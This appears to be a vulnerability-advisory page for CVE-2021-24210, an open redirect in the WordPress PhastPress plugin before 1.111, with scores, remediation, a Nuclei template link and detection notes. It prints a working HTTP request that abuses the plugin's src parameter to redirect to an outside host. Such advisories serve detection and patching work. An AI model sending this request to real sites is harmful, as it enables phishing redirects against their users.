🔙 목록으로 돌아가기

CVE-2021-24210: WordPress PhastPress <1.111 - Open Redirect

TitleWordPress PhastPress <1.111 - Open Redirect
Author0x_Akoko
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the execution of other malicious activities.
RemediationUpdate the WordPress PhastPress plugin to version 1.111 or later to mitigate the vulnerability.
CVSS Score6.1
EPSS Score0.11853
CVE IDCVE-2021-24210
CWE IDCWE-601
Tags cve2021 cve redirect wpscan wordpress kiboit vuln

🔍 Vulnerability Description

WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24210.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24210.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A